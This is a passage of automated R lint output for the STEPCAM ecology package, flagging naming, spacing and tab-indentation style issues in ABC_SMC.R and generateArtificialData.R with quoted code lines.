^~~~~~~~\n```\n[R/ABC_SMC.R:251:35:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:251:51:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:252:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:32:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L252) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:252:37:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:255:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:255:26:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L255) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:255:26:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:256:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:258:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:61:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L265) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:269:63:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L269) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:272:15:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L272) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:273:44:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L273) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           